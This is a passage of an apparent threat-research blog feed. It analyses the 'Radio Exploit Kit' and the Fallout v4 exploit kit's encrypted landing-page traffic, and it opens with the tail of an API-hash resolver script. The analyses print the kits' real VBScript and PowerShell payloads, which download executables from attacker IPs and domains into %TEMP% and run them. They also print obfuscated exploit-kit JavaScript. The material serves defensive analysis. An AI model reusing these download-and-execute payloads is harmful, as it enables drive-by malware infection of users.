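    hashes = list(hashes)
    db = build_hash_db(names)
    return [f"{h:#010x} -> {name or '<unresolved>'}"
            for h, name in zip(hashes, resolve(hashes, db))]


if __name__ == "__main__":
    # Constructed input: the hash of WinExec and one value outside the table.
    for line in annotate([imul83h_add("WinExec"), 0xDEADBEEF]):
        print(line)
```

<p>Hashes the table does not cover come back as <code class="language-plaintext highlighter-rouge">&lt;unresolved&gt;</code>; widening the candidate list (every export of the DLLs the shellcode loads) is what closes those gaps in practice, and a collision inside the table is raised rather than masked so that a wrong name never lands in the notes.</p>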
  61. Weak Drive-by Download attack with “Radio Exploit Kit”

    Mon, 15 Jul 2019 15:00:00 -0000

    <h2 id="first">First</h2> <p>Since July 11, 2019, we have observed a new Drive-by Download attack. It is redirected from the ad-network. It does not use a conventional Exploit Kit such as RIG or Fallout, but uses its own exploit kit. We call this “Radio Exploit Kit”.</p> <blockquote class="twitter-tweet" data-lang="ja"><p lang="en" dir="ltr">Malvertising -&gt; Unknown EK🚀 -&gt; <a href="https://twitter.com/hashtag/AZORult?src=hash&amp;ref_src=twsrc%5Etfw">#AZORult</a><br />(CC: <a href="https://twitter.com/malware_traffic?ref_src=twsrc%5Etfw">@malware_traffic</a>, <a href="https://twitter.com/jeromesegura?ref_src=twsrc%5Etfw">@jeromesegura</a>, <a href="https://twitter.com/BleepinComputer?ref_src=twsrc%5Etfw">@BleepinComputer</a>)<a href="https://t.co/CkSfs38D8q">https://t.co/CkSfs38D8q</a> <a href="https://t.co/Uk37R7g1xh">pic.twitter.com/Uk37R7g1xh</a></p>&mdash; nao_sec (@nao_sec) <a href="https://twitter.com/nao_sec/status/1149273164058222592?ref_src=twsrc%5Etfw">July 11, 2019</a></blockquote> <p>The Radio Exploit Kit is not advanced. It exploits a well-worn vulnerability, CVE-2016-0189. The exploit kit code is also unrefined. It simply delivers malware (we are observing AZORult) using the CVE-2016-0189 PoC. We don’t expect this to be a real threat. Most ordinary people will not be affected by it. However, I write this article because it is often observed in Japan. Be aware that these threats exist.</p> <h2 id="traffic">Traffic</h2> <p>This exploit kit is still evolving. Five updates have been made since we started observation (including simple path updates). We identify each one as follows. 
Here we introduce v1.0, 1.1 and 1.2.0.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Version First seen 2nd URL 1.0 2019-07-11_10-00 https[:]//radiobox-online.org/images/image.vbs2 1.1 2019-07-12-20-00 http[:]//95.215.207.24/error.jp 1.2.0 2019-07-13_14-00 http[:]//95.215.207.24/im/1.jpg 1.2.1 2019-07-13_15-00 http[:]//95.215.207.24/im/build1.jpg 1.2.2 2019-07-14_13-00 http[:]//95.215.207.24/im/build11.jpg 1.2.3 2019-07-14_20-00 http[:]//95.215.207.24/im/vkino2.mid </code></pre></div></div> <h3 id="v10">v1.0</h3> <p>First, let’s look at v1.0. It is the traffic when we first encountered Radio EK.</p> <p><img src="https://nao-sec.org/assets/2019-07-16/1.0.png" alt="" /></p> <p>When redirected from the ad-network to <code class="language-plaintext highlighter-rouge">https [:] // radiobox-online.org</code>, code that exploits CVE-2016-0189 will be executed. This is not obfuscated and is the same as PoC. The important code is this.</p> <div class="language-vb highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">Set</span> <span class="kt">Object</span> <span class="o">=</span> <span class="n">CreateObject</span><span class="p">(</span><span class="s">"Shell.Application"</span><span class="p">)</span> <span class="kt">Object</span><span class="p">.</span><span class="n">ShellExecute</span> <span class="s">"PowerShell"</span><span class="p">,</span><span class="s">"(New-Object System.Net.WebClient).DownloadFile('https[:]//radiobox-online.org/images/image.vbs2','documentation.vbs');Start-Process 'documentation.vbs'"</span> </code></pre></div></div> <p>This will generate a second traffic. 
<code class="language-plaintext highlighter-rouge">image.vbs2</code> is a very simple code.</p> <div class="language-vb highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">mm</span> <span class="o">=</span> <span class="s">"h"</span> <span class="n">nn</span> <span class="o">=</span> <span class="s">"t"</span> <span class="n">bb</span> <span class="o">=</span> <span class="s">"/"</span> <span class="n">vv</span> <span class="o">=</span> <span class="s">":"</span> <span class="n">cc</span> <span class="o">=</span> <span class="s">"p"</span> <span class="n">x</span> <span class="o">=</span> <span class="s">"."</span> <span class="n">zz</span> <span class="o">=</span> <span class="s">"vbs"</span> <span class="n">q</span> <span class="o">=</span> <span class="s">"0"</span> <span class="n">w</span> <span class="o">=</span> <span class="s">"1"</span> <span class="n">e</span> <span class="o">=</span> <span class="s">"2"</span> <span class="n">r</span> <span class="o">=</span> <span class="s">"3"</span> <span class="n">t</span> <span class="o">=</span> <span class="s">"4"</span> <span class="n">y</span> <span class="o">=</span> <span class="s">"5"</span> <span class="n">u</span> <span class="o">=</span> <span class="s">"6"</span> <span class="n">a</span> <span class="o">=</span> <span class="s">"7"</span> <span class="n">s</span> <span class="o">=</span> <span class="s">"8"</span> <span class="n">f</span> <span class="o">=</span> <span class="s">"9"</span> <span class="n">strr</span> <span class="o">=</span> <span class="n">mm&amp;nn&amp;nn&amp;cc&amp;vv&amp;bb&amp;bb</span> <span class="n">rrts</span> <span class="o">=</span> <span class="n">t&amp;y&amp;x&amp;w&amp;e&amp;x&amp;e&amp;w&amp;y&amp;x&amp;w&amp;y&amp;a&amp;bb</span> <span class="n">rprt</span> <span class="o">=</span> <span class="n">strr&amp;rrts</span> <span class="n">d</span><span class="p">.</span><span class="n">Add</span> <span class="s">"1"</span><span 
class="p">,</span> <span class="s">""</span><span class="o">&amp;</span><span class="n">rprt&amp;</span><span class="s">"src/load2.jpg|"</span><span class="o">&amp;</span><span class="n">temp&amp;</span><span class="s">"\temp.vbs"</span> <span class="k">Set</span> <span class="n">x</span> <span class="o">=</span> <span class="n">CreateObject</span><span class="p">(</span><span class="s">"MSXML2.XMLHTTP"</span><span class="p">)</span> <span class="k">For</span> <span class="k">Each</span> <span class="n">i</span> <span class="ow">In</span> <span class="n">d</span> <span class="n">x</span><span class="p">.</span><span class="n">open</span> <span class="s">"GET"</span><span class="p">,</span> <span class="n">Split</span><span class="p">(</span><span class="n">d</span><span class="p">.</span><span class="n">Item</span><span class="p">(</span><span class="n">i</span><span class="p">),</span> <span class="s">"|"</span><span class="p">)(</span><span class="mi">0</span><span class="p">),</span> <span class="n">false</span> <span class="n">x</span><span class="p">.</span><span class="n">send</span><span class="p">()</span> </code></pre></div></div> <p>This will load <code class="language-plaintext highlighter-rouge">load2.jpg</code>. 
<code class="language-plaintext highlighter-rouge">load2.jpg</code> is also a simple code.</p> <div class="language-vb highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">Set</span> <span class="n">css</span> <span class="o">=</span> <span class="n">CreateObject</span><span class="p">(</span><span class="s">"WScript.Shell"</span><span class="p">)</span> <span class="n">css</span> <span class="o">=</span> <span class="s">"http[:]//45.12.215.157/images/"</span> <span class="n">ico</span> <span class="o">=</span> <span class="s">".exe"</span> <span class="n">css1</span> <span class="o">=</span> <span class="s">"temp"</span> <span class="o">&amp;</span> <span class="n">rand</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">100</span><span class="p">)</span> <span class="n">css2</span> <span class="o">=</span> <span class="s">"temp"</span> <span class="o">&amp;</span> <span class="n">rand</span><span class="p">(</span><span class="mi">101</span><span class="p">,</span> <span class="mi">200</span><span class="p">)</span> <span class="n">css3</span> <span class="o">=</span> <span class="s">"temp"</span> <span class="o">&amp;</span> <span class="n">rand</span><span class="p">(</span><span class="mi">201</span><span class="p">,</span> <span class="mi">300</span><span class="p">)</span> <span class="n">css4</span> <span class="o">=</span> <span class="s">"temp"</span> <span class="o">&amp;</span> <span class="n">rand</span><span class="p">(</span><span class="mi">301</span><span class="p">,</span> <span class="mi">400</span><span class="p">)</span> <span class="n">css5</span> <span class="o">=</span> <span class="s">"temp"</span> <span class="o">&amp;</span> <span class="n">rand</span><span class="p">(</span><span class="mi">401</span><span class="p">,</span> <span class="mi">500</span><span class="p">)</span> <span class="k">Set</span> <span class="n">oShell</span> <span class="o">=</span> 
<span class="n">CreateObject</span><span class="p">(</span> <span class="s">"WScript.Shell"</span> <span class="p">)</span> <span class="n">temp</span><span class="o">=</span><span class="n">oShell</span><span class="p">.</span><span class="n">ExpandEnvironmentStrings</span><span class="p">(</span><span class="s">"%TEMP%\"</span><span class="p">)</span> <span class="k">Dim</span> <span class="nv">good</span> <span class="k">Set</span> <span class="n">good</span> <span class="o">=</span> <span class="n">CreateObject</span><span class="p">(</span><span class="s">"WScript.Shell"</span><span class="p">)</span> <span class="n">good</span> <span class="o">=</span> <span class="mi">200</span> <span class="c1">''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''1</span> <span class="n">set</span> <span class="n">d</span> <span class="o">=</span> <span class="n">CreateObject</span><span class="p">(</span><span class="s">"Scripting.Dictionary"</span><span class="p">)</span> <span class="n">d</span><span class="p">.</span><span class="n">Add</span> <span class="s">"1"</span><span class="p">,</span> <span class="s">""</span> <span class="o">&amp;</span> <span class="n">css</span> <span class="o">&amp;</span> <span class="s">"1.jpg|"</span><span class="o">&amp;</span><span class="n">temp&amp;</span><span class="s">""</span> <span class="o">&amp;</span> <span class="n">css1</span> <span class="o">&amp;</span> <span class="s">""</span> <span class="o">&amp;</span> <span class="n">ico</span> <span class="o">&amp;</span> <span class="s">""</span> <span class="k">Set</span> <span class="n">ar1</span> <span class="o">=</span> <span class="n">CreateObject</span><span class="p">(</span><span class="s">"MSXML2.XMLHTTP"</span><span class="p">)</span> <span class="k">For</span> <span class="k">Each</span> <span class="n">i</span> <span class="ow">In</span> <span class="n">d</span> <span class="n">ar1</span><span class="p">.</span><span class="n">open</span> <span 
class="s">"GET"</span><span class="p">,</span> <span class="n">Split</span><span class="p">(</span><span class="n">d</span><span class="p">.</span><span class="n">Item</span><span class="p">(</span><span class="n">i</span><span class="p">),</span> <span class="s">"|"</span><span class="p">)(</span><span class="mi">0</span><span class="p">),</span> <span class="n">false</span> <span class="n">ar1</span><span class="p">.</span><span class="n">send</span><span class="p">()</span> <span class="k">If</span> <span class="n">ar1</span><span class="p">.</span><span class="n">Status</span> <span class="o">=</span> <span class="n">good</span> <span class="k">Then</span> <span class="k">With</span> <span class="n">CreateObject</span><span class="p">(</span><span class="s">"ADODB.Stream"</span><span class="p">)</span> <span class="p">.</span><span class="n">Open</span> <span class="p">.</span><span class="n">Type</span> <span class="o">=</span> <span class="mi">1</span> <span class="p">.</span><span class="n">Write</span> <span class="n">ar1</span><span class="p">.</span><span class="n">ResponseBody</span> <span class="p">.</span><span class="n">Position</span> <span class="o">=</span> <span class="mi">0</span> <span class="p">.</span><span class="n">SaveToFile</span> <span class="n">Split</span><span class="p">(</span><span class="n">d</span><span class="p">.</span><span class="n">Item</span><span class="p">(</span><span class="n">i</span><span class="p">),</span> <span class="s">"|"</span><span class="p">)(</span><span class="mi">1</span><span class="p">),</span> <span class="mi">2</span> <span class="p">.</span><span class="n">Close</span> <span class="k">End</span> <span class="k">With</span> <span class="n">set</span> <span class="n">WshShell</span> <span class="o">=</span> <span class="n">WScript</span><span class="p">.</span><span class="n">CreateObject</span><span class="p">(</span><span class="s">"Wscript.Shell"</span><span class="p">)</span> <span 
class="n">WshShell</span><span class="p">.</span><span class="n">Run</span> <span class="n">temp</span> <span class="o">&amp;</span> <span class="s">""</span><span class="o">&amp;</span> <span class="n">css1</span> <span class="o">&amp;</span><span class="s">""</span> <span class="o">&amp;</span> <span class="n">ico</span> <span class="o">&amp;</span> <span class="s">""</span><span class="p">,</span> <span class="p">,</span><span class="n">true</span> <span class="k">End</span> <span class="k">If</span> <span class="k">Next</span> </code></pre></div></div> <p>This process is repeated from <code class="language-plaintext highlighter-rouge">1.jpg</code> to<code class="language-plaintext highlighter-rouge"> 5.jpg</code> in order. The <code class="language-plaintext highlighter-rouge">1.jpg</code> downloaded and executed in this way is malware. Malware is unencrypted and is plain binary.</p> <h3 id="v11">v1.1</h3> <p>Next, let’s look at v1.1.</p> <p><img src="https://nao-sec.org/assets/2019-07-16/1.1.png" alt="" /></p> <p>For v1.1, the code executed by CVE-2016-0189 is as follows:</p> <div class="language-vb highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">Set</span> <span class="kt">Object</span> <span class="o">=</span> <span class="n">CreateObject</span><span class="p">(</span><span class="s">"Shell.Application"</span><span class="p">)</span> <span class="kt">Object</span><span class="p">.</span><span class="n">ShellExecute</span> <span class="s">"PowerShell"</span><span class="p">,</span> <span class="s">"(New-Object System.Net.WebClient).DownloadString('https[:]//2no.co/1ehqM6');$local_path = [System.IO.Path]::GetTempPath();(New-Object System.Net.WebClient).DownloadFile('http[:]//95.215.207.24/error.jp', $local_path+'documentation.vbs');$local_path2 = [System.IO.Path]::GetTempPath()+'documentation.vbs';Start-Process $local_path2"</span> </code></pre></div></div> <p>Unlike v1.0, the VBScript URL to be loaded next is <code 
class="language-plaintext highlighter-rouge">http[:]//95.215.207.24/error.jp</code>. At this time, the end of the URL is <code class="language-plaintext highlighter-rouge">.jp</code>. I don’t know if this is a mistake in hitting <code class="language-plaintext highlighter-rouge">jpg</code> or meaning <code class="language-plaintext highlighter-rouge">Japan</code>.</p> <p><code class="language-plaintext highlighter-rouge">error.jp</code> will execute code similar to v1.0 <code class="language-plaintext highlighter-rouge">load2.jpg</code>.</p> <div class="language-vb highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">Set</span> <span class="n">css</span> <span class="o">=</span> <span class="n">CreateObject</span><span class="p">(</span><span class="s">"WScript.Shell"</span><span class="p">)</span> <span class="n">css</span> <span class="o">=</span> <span class="s">"http[:]//95.215.207.24/im/"</span> <span class="n">ico</span> <span class="o">=</span> <span class="s">".exe"</span> <span class="n">css1</span> <span class="o">=</span> <span class="s">"temp"</span> <span class="o">&amp;</span> <span class="n">rand</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">100</span><span class="p">)</span> <span class="n">css2</span> <span class="o">=</span> <span class="s">"temp"</span> <span class="o">&amp;</span> <span class="n">rand</span><span class="p">(</span><span class="mi">101</span><span class="p">,</span> <span class="mi">200</span><span class="p">)</span> <span class="n">css3</span> <span class="o">=</span> <span class="s">"temp"</span> <span class="o">&amp;</span> <span class="n">rand</span><span class="p">(</span><span class="mi">201</span><span class="p">,</span> <span class="mi">300</span><span class="p">)</span> <span class="n">css4</span> <span class="o">=</span> <span class="s">"temp"</span> <span class="o">&amp;</span> <span class="n">rand</span><span class="p">(</span><span 
class="mi">301</span><span class="p">,</span> <span class="mi">400</span><span class="p">)</span> <span class="n">css5</span> <span class="o">=</span> <span class="s">"temp"</span> <span class="o">&amp;</span> <span class="n">rand</span><span class="p">(</span><span class="mi">401</span><span class="p">,</span> <span class="mi">500</span><span class="p">)</span> <span class="k">Set</span> <span class="n">oShell</span> <span class="o">=</span> <span class="n">CreateObject</span><span class="p">(</span> <span class="s">"WScript.Shell"</span> <span class="p">)</span> <span class="n">temp</span><span class="o">=</span><span class="n">oShell</span><span class="p">.</span><span class="n">ExpandEnvironmentStrings</span><span class="p">(</span><span class="s">"%TEMP%\"</span><span class="p">)</span> <span class="k">Dim</span> <span class="nv">good</span> <span class="k">Set</span> <span class="n">good</span> <span class="o">=</span> <span class="n">CreateObject</span><span class="p">(</span><span class="s">"WScript.Shell"</span><span class="p">)</span> <span class="n">good</span> <span class="o">=</span> <span class="mi">200</span> <span class="c1">''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''1</span> <span class="n">set</span> <span class="n">d</span> <span class="o">=</span> <span class="n">CreateObject</span><span class="p">(</span><span class="s">"Scripting.Dictionary"</span><span class="p">)</span> <span class="n">d</span><span class="p">.</span><span class="n">Add</span> <span class="s">"1"</span><span class="p">,</span> <span class="s">""</span> <span class="o">&amp;</span> <span class="n">css</span> <span class="o">&amp;</span> <span class="s">"1.jpg|"</span><span class="o">&amp;</span><span class="n">temp&amp;</span><span class="s">""</span> <span class="o">&amp;</span> <span class="n">css1</span> <span class="o">&amp;</span> <span class="s">""</span> <span class="o">&amp;</span> <span class="n">ico</span> <span class="o">&amp;</span> 
<span class="s">""</span> <span class="k">Set</span> <span class="n">ar1</span> <span class="o">=</span> <span class="n">CreateObject</span><span class="p">(</span><span class="s">"MSXML2.XMLHTTP"</span><span class="p">)</span> <span class="k">For</span> <span class="k">Each</span> <span class="n">i</span> <span class="ow">In</span> <span class="n">d</span> <span class="n">ar1</span><span class="p">.</span><span class="n">open</span> <span class="s">"GET"</span><span class="p">,</span> <span class="n">Split</span><span class="p">(</span><span class="n">d</span><span class="p">.</span><span class="n">Item</span><span class="p">(</span><span class="n">i</span><span class="p">),</span> <span class="s">"|"</span><span class="p">)(</span><span class="mi">0</span><span class="p">),</span> <span class="n">false</span> <span class="n">ar1</span><span class="p">.</span><span class="n">send</span><span class="p">()</span> <span class="k">If</span> <span class="n">ar1</span><span class="p">.</span><span class="n">Status</span> <span class="o">=</span> <span class="n">good</span> <span class="k">Then</span> <span class="k">With</span> <span class="n">CreateObject</span><span class="p">(</span><span class="s">"ADODB.Stream"</span><span class="p">)</span> <span class="p">.</span><span class="n">Open</span> <span class="p">.</span><span class="n">Type</span> <span class="o">=</span> <span class="mi">1</span> <span class="p">.</span><span class="n">Write</span> <span class="n">ar1</span><span class="p">.</span><span class="n">ResponseBody</span> <span class="p">.</span><span class="n">Position</span> <span class="o">=</span> <span class="mi">0</span> <span class="p">.</span><span class="n">SaveToFile</span> <span class="n">Split</span><span class="p">(</span><span class="n">d</span><span class="p">.</span><span class="n">Item</span><span class="p">(</span><span class="n">i</span><span class="p">),</span> <span class="s">"|"</span><span class="p">)(</span><span 
class="mi">1</span><span class="p">),</span> <span class="mi">2</span> <span class="p">.</span><span class="n">Close</span> <span class="k">End</span> <span class="k">With</span> <span class="n">set</span> <span class="n">WshShell</span> <span class="o">=</span> <span class="n">WScript</span><span class="p">.</span><span class="n">CreateObject</span><span class="p">(</span><span class="s">"Wscript.Shell"</span><span class="p">)</span> <span class="n">WshShell</span><span class="p">.</span><span class="n">Run</span> <span class="n">temp</span> <span class="o">&amp;</span> <span class="s">""</span><span class="o">&amp;</span> <span class="n">css1</span> <span class="o">&amp;</span><span class="s">""</span> <span class="o">&amp;</span> <span class="n">ico</span> <span class="o">&amp;</span> <span class="s">""</span><span class="p">,</span> <span class="p">,</span><span class="n">true</span> <span class="k">End</span> <span class="k">If</span> <span class="k">Next</span> </code></pre></div></div> <p>This is also repeated until <code class="language-plaintext highlighter-rouge">/im/5.jpg</code>. The <code class="language-plaintext highlighter-rouge">/im/1.jpg</code> that is downloaded and executed is the malware. As in v1.0, the malware is not encrypted.</p> <h3 id="v120">v1.2.0</h3> <p>Finally, let’s look at v1.2.</p> <p><img src="https://nao-sec.org/assets/2019-07-16/1.2.png" alt="" /></p> <p>It has become very simple; there is almost nothing to it.
The code executed by CVE-2016-0189 is as follows:</p> <div class="language-vb highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">Set</span> <span class="kt">Object</span> <span class="o">=</span> <span class="n">CreateObject</span><span class="p">(</span><span class="s">"Shell.Application"</span><span class="p">)</span>
<span class="kt">Object</span><span class="p">.</span><span class="n">ShellExecute</span> <span class="s">"PowerShell"</span><span class="p">,</span> <span class="s">"(New-Object System.Net.WebClient).DownloadString('https[:]//2no.co/1YdQt7');$local_path = [System.IO.Path]::GetTempPath();(New-Object System.Net.WebClient).DownloadFile('http[:]//95.215.207.24/im/1.jpg', $local_path+'documentation.exe');$local_path2 = [System.IO.Path]::GetTempPath()+'documentation.exe';Start-Process $local_path2"</span> </code></pre></div></div> <p>Thus, the <code class="language-plaintext highlighter-rouge">/im/1.jpg</code> that is downloaded and executed is the malware. As before, the malware is not encrypted.</p> <p>Only the path of <code class="language-plaintext highlighter-rouge">/im/1.jpg</code> has changed since v1.2.0; the essential process is the same.</p> <h2 id="conclusion">Conclusion</h2> <p>Radio EK is active, but its attack capability is very low. Compared to RIG and Fallout, it is not a threat that should trouble you. However, there may be aggressive updates in the future, so you should be aware that this EK exists.</p>
  62. Steady Evolution of Fallout v4

    Tue, 09 Jul 2019 15:00:00 -0000

    First

    We have been observing the Fallout Exploit Kit since August 2018. Fallout uses non-characteristic URLs and a heavily obfuscated landing page. It still has users, and attacks are observed daily. Recently, we were investigating an attack campaign that infects Raccoon Stealer in the flow of PopAds-&gt; KeitaroTDS-&gt; Fallout.

    About Fallout, we have already written three reports. The first one was about the emergence of Fallout, the second one about its adoption of PowerShell and the third one about its use of a PoC from GitHub. We divide these major changes by version and call them v1~3.

    - Hello “Fallout Exploit Kit” (https://nao-sec.org/2018/09/hello-fallout-exploit-kit.html)
    - In-Depth analysis of new Fallout Exploit Kit (https://nao-sec.org/2019/01/in-depth-analysis-of-new-fallout.html)
    - Analysis of Fallout Exploit Kit v3 (https://nao-sec.org/2019/03/analysis-of-fallout-exploit-kit-v3.html)

    We wrote about v3 in March 2019. v3 was not stable and was updated to the next version immediately. @EKFiddle (created and maintained by @jeromesegura) reported this change on April 11.

        #EKFiddle [Regex update]: #FalloutEK
        Seems like there is no more use of the PoC on GitHub for CVE-2018-8174.
        Pushing #GandCrab in this particular instance.
        https://t.co/U67qZosp1e pic.twitter.com/buVTakYuhJ
        &mdash; EKFiddle (@EKFiddle) April 11, 2019

    We call this big update v4 (it is still v4). No detailed analysis report has been written about what this update changed. However, the update is very big; at least for us (exploit kit analysts) it made analysis very cumbersome. Fallout v4 incorporates the following features.

    1. Diffie-Hellman key exchange
    2. VM detection
    3. Process detection

    Here, we will share detailed analysis results on the updates made in Fallout v4. Unfortunately, we did not understand everything. If you know more, please help us.

    Traffic chain

    First, let’s look at the previous traffic chain. v1~3 was like this. In v3, it acquired the PoC for CVE-2018-8174 from GitHub and attacked by rewriting the shellcode part. So what does the v4 traffic chain look like?

    1. Landing Page
    2. JavaScript Code
    3. Encoded Code 1
    4.
    Encoded Code 2 (CVE-2018-8174 + SWF Loader)
    5. CVE-2018-15982
    6. PowerShell Code
    7. Malware

    In this way, an attack is performed over seven network requests. Let’s look at each one in order. (In the following, we will use different traffic data from the above. The detailed reason will be mentioned later, but it is difficult to capture and analyze traffic at the same time.)

    Landing Page + JS Code + Encoded Data

    In the landing page, JavaScript code is loaded first.

        &lt;!DOCTYPE html&gt;
        &lt;html&gt;
        &lt;head&gt;
        &lt;meta http-equiv="x-ua-compatible" content="IE=10"&gt;
        &lt;script type="text/javascript" src="/04_09_2003/Symposium?Peristele=02_03_1943&amp;LE3r=Aps&amp;ILZhH=Frazzling-Anorexias"&gt;&lt;/script&gt;
        &lt;/head&gt;

    This script contains obfuscated copies of CryptoJS and BigInteger. Excluding the large library parts, there is very little processing.

        // key
        window.III1l1 = window["Il1IIllIlI1I"]["IIIlI"]["II1I1lI1I"]["ll1llI1"]("8b69cbdfc5fe43e69b7920c8ee721fc9");
        // iv
        window.II1ll11I = window["Il1IIllIlI1I"]["IIIlI"]["II1I1lI1I"]["ll1llI1"]("301ae8205ddcd5897df69e3b0c056c34");
        // aes_decrypt(enc_data, key, iv)
        window.l11llIll = window["Il1IIllIlI1I"]["lI11lIl"]["l11II11l"]("p4N9IqH/oiAKHkDCR0zXXfrvhwVrVPsFZSNUjkVFXxxBofjpd5JLM1sdAega3oRy", III1l1, { lI1lIl1Ill: II1ll11I })["lIlIlll11l"](window["Il1IIllIlI1I"]["IIIlI"]["Il11I1II"]);

    First, two values (8b69cbdfc5fe43e69b7920c8ee721fc9 and 301ae8205ddcd5897df69e3b0c056c34) appear. These are the key and IV for AES. Decrypting the following Base64 string with this key and IV yields the necessary data, specifically the URL from which the encoded data used in the next step is fetched. When decrypted, it looks like this.

    Next comes the check of which browser is being used: Opera, Firefox, IE or Chrome, respectively.
        // check browser
        window["String"]["prototype"]["II1l1IlI"] = function () {
            return (!!window["opr"] &amp;&amp; !!window["opr"]["addons"] || !!window["opera"] || navigator["userAgent"]["indexOf"](" OPR/") &gt;= 0) + this + (typeof window["InstallTrigger"] !== "undefined") + this + (false || !!window["document"]["documentMode"]) + this + (!!window["chrome"] &amp;&amp; !!window["chrome"]["runtime"])
        };

    Then there is a check of the Adobe Flash Player version. This value is used later.

        (function () {
            window.l1l111I = '';
            try {
                window.l1l111I = new ActiveXObject('ShockwaveFlash.ShockwaveFlash').getVariable('$version')
            } catch (e) {}
        })();

    Control then returns to the landing page, where one function is defined and executed. Let’s look at that function.

        // str_A
        var l1ll1 = window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l']();
        // str_B
        var lIlII11 = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](), 16);
        // str_C
        var ll1l1IlIIIll = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](), 16);
        // str_D
        var lll1II = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](), 16);
        // str_E =&gt; str_B.modPow(str_C, str_D)
        var l11IlIl = lIlII11['ll11IIl'](ll1l1IlIIIll, lll1II);

    Here, the expression window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l']() appears many times. It is defined in CryptoJS and generates a 32-character random hexadecimal string. After generating four random values, the second, third and fourth of them are used to generate a fifth value; modPow is used here. These five values are used in the cryptographic process that follows; we call them str_A, str_B, str_C, str_D and str_E.

    The code that follows is divided into three parts. The first is the onreadystatechange handler, called after the request has been sent to the server.
    The second generates the data to be sent, and the third sends it. These are the standard XMLHttpRequest POST procedures. First, let’s look at the code that generates the data to send.

        var l11IlIIlllll = {};
        l11IlIIlllll['lIlII11'] = lIlII11['lIlIlll11l'](16); // str_B
        l11IlIIlllll['lll1II'] = lll1II['lIlIlll11l'](16); // str_D
        l11IlIIlllll['l11IlIl'] = l11IlIl['lIlIlll11l'](16); // str_E
        l11IlIIlllll['lI1lIl1Ill'] = l1ll1; // str_A
        // browser check data
        l11IlIIlllll['II1l1IlI'] = '@@' ['II1l1IlI']();

    Five values are added to the object l11IlIIlllll. All but the last are the random values created earlier: of the five random values, all except str_C are sent. The last one is the browser check result generated earlier; it records whether the browser is Opera, Firefox, IE or Chrome, respectively, as true or false values joined with @@. This is the data prepared for sending. Note that str_C is never sent to the server.

    Next, let’s look at the sending process.

        window['I1l1I1'](Il1I11l, "post", l11llIll, true);
        /* -- snip -- */
        // Send POST
        window['l1lllIIlI'](
            Il1I11l,
            // aes_encrypt(data, key, iv)
            window['Il1IIllIlI1I']['lI11lIl']['Ill1lI1Ill'](
                window['IIII1Il'](l11IlIIlllll), // post request data
                window['III1l1'], // key
                { lI1lIl1Ill: window['II1ll11I'] } // iv
            )['lIlIlll11l']()
        );

    This too is an ordinary request-sending routine. The URL is the string decrypted with AES earlier. The data sent is the object prepared above, encrypted with AES; the key and IV are the same ones used to decrypt the URL. Before encryption, the data looks like this.

        {
            "lIlII11":"c81e728d9d4c2f636f067f89cc14862c",
            "lll1II":"a87ff679a2f3e71d9181a67b7542122c",
            "l11IlIl":"3f05415ebff145466040f6a73dca8704",
            "lI1lIl1Ill":"c4ca4238a0b923820dcc509a6f75849b",
            "II1l1IlI":"false@@false@@true@@false"
        }

    The data actually sent is encrypted like this.
        TvU4TAyld3MNlDcMtLwxBo+uVXAbIB1jpPO1a9HDv2dZs7HonG67s8heWoMyvnUFqFBdoEhU0STYjHHQxX6DK7x7Z1naG/2TAdm+AR5l6gpYVl4jXB9oOOyfJtZrfJHabQT5Jhlqv1dtvsJ+0G27qhamqtPT16wCpXn2R2WHf8NJu9SvXSSVadW7sT6QDt32Jt0z3oR0VIlpuE/w3snfKDNIjJYhuMz/VGYIL9WNdg0hC26sxB5fJ5fOOuifh2rNk9GgNsNdfVP01Tf77GRDu9puTbgfsgYOnCz0ONOmp05B14kJ1tK8ZI6ciOWLvOYV

    Let’s look at what happens after sending, when onreadystatechange is called. Here, two AES decryptions are performed. Let’s look at the first one.

        // aes_decrypt(enc_data, key, iv)
        var lIlIl1IIl11 = window['Il1IIllIlI1I']['lI11lIl']['l11II11l'](
            Il1I11l['responseText'], // enc_data
            window['III1l1'], // key
            { lI1lIl1Ill: window['II1ll11I'] } // iv
        )['lIlIlll11l'](window['Il1IIllIlI1I']['IIIlI']['Il11I1II']);
        var l1I1l1 = window['lIl11'](lIlIl1IIl11);

    The POST response is encrypted with AES. The key and IV are the same as before, that is, the values (8b69cbdfc5fe43e69b7920c8ee721fc9 and 301ae8205ddcd5897df69e3b0c056c34) hard-coded in the JavaScript. Decryption yields JSON, so the result is parsed as JSON. The decrypted JSON looks like this.

        {
            "IlI1l":"9b412e5c651d73fd1e271dd63f6901a0",
            "I1111":"r+sZGwxURs48PDt8pilYLNYjKbVrMHSmlgv0jeEE7qd8KN+KbbqRpYBUUrEFfM5VSLfRPthHQmyzFoY7fuCtOQQ9vUiMBC+3\/pL…"
        }

    The second value is decrypted using the first one (a 32-character hexadecimal string), which we call str_F. This is also AES, but the key and IV are different from before.
        var lIlll1IIlI = window['l1l1IIlIlI'](l1I1l1['lIlll1IIlI'], 16); // str_F
        // key (str_G) =&gt; str_F.modPow(str_C, str_D)
        var llIIlI = lIlll1IIlI['ll11IIl'](ll1l1IlIIIll, lll1II);
        var I1Il1I1 = llIIlI['lIlIlll11l'](16);
        var IIIIlI1IllII = 32 - I1Il1I1.length;
        while (IIIIlI1IllII &gt; 0) {
            I1Il1I1 = '0' + I1Il1I1;
            IIIIlI1IllII--;
        }
        var II1ll = window['Il1IIllIlI1I']['IIIlI']['II1I1lI1I']['ll1llI1'](I1Il1I1);
